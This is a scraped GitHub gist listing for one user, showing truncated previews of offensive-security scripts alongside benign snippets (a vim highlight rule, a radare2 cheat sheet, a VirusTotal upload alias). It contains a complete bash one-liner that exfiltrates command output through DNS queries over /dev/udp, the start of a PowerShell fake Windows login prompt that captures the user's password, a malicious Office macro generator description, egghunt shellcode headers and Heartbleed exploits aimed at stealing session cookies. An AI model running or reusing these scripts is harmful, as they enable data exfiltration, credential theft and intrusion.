lucam luca-m
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| syntax match nonascii "[^\x00-\x7F]" | |
| highlight nonascii guibg=Red ctermbg=2 termbg=2 |
luca-m
/ gen_macro_doc.ps1
Created
January 24, 2015 10:16
Generate a malicious Microsoft Office document with a specified payload and persistence method (https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Coded by Matt Nelson (@enigma0x3) | |
| <# | |
| .SYNOPSIS | |
| Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method | |
| .DESCRIPTION | |
| This script will generate malicious Microsoft Excel Documents that contain VBA macros. This script will prompt you for your attacking IP | |
| (the one you will receive your shell at), the port you want your shell at, and the name of the document. From there, the script will then | |
| display a menu of different attacks, all with different persistence methods. Once an attack is chosen, it will then prompt you for your payload type | |
| (Only HTTP and HTTPS are supported). |
luca-m
/ invoke_login.ps1
Created
January 24, 2015 10:10
Invoke login prompt (https://github.com/enigma0x3/Invoke-LoginPrompt/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Coded by Matt N. | |
| #Twitter: @enigma0x3 | |
| #Blog: www.enigma0x3.wordpress.com | |
| function Invoke-LoginPrompt{ | |
| $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","") | |
| $username = "$env:username" | |
| $domain = "$env:userdomain" | |
| $full = "$domain" + "\" + "$username" | |
| $password = $cred.GetNetworkCredential().password | |
| Add-Type -assemblyname System.DirectoryServices.AccountManagement |
luca-m
/ BASH_DNS_DATAEXFIL
Created
January 22, 2015 21:05
Ref. http://www.reddit.com/r/netsec/comments/2t3l5s/bash_data_exfiltration_through_dns_using_bash/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Optimized egghunt shellcode for win32 (32 bytes) | |
| * | |
| * Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| * | |
| * Description | |
| * | |
| * This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram) | |
| * whereby it uses the kernel to validate whether or not a set of addresses | |
| * is valid, and, if it is, whether or not they match the 8 byte egg we're |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ---------------------------------------------------------------------- | |
| # Radare2 | |
| # (Quick n'dirty) Cheat-Sheet | |
| # lucam.ko@gmail.com | |
| # ---------------------------------------------------------------------- | |
| # See http://radare.org/doc/html/contents.html for details | |
| # ---------------------------------------------------------------------- | |
| # MISC |
luca-m
/ virustotal_upload
Created
May 26, 2014 19:01
Upload a sample to VirusTotal and pretty print the report. All in a handy alias.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Upload a sample to VirusTotal and pretty print the report. All in a handy alias. | |
| # | |
| # Dependecies: | |
| # | |
| # * python > 2.7 | |
| # * pip install Pygments==1.4 | |
| # * curl | |
| # * VirusTotal API key | |
| # |
luca-m
/ hb-test.py
Created
April 9, 2014 04:03
— forked from takeshixx/hb-test.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import sys | |
| import struct | |
| import socket | |
| import time | |
| import select |
luca-m
/ heartbleed-altered.py
Created
April 9, 2014 04:00
— forked from mpdavis/heartbleed-altered.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
| # Michael Davis (mike.philip.davis@gmail.com) | |
| # Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
| # The author disclaims copyright to this source code. | |
| import select |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # intervals | |
| equal.count(seq(0,10,1),4) |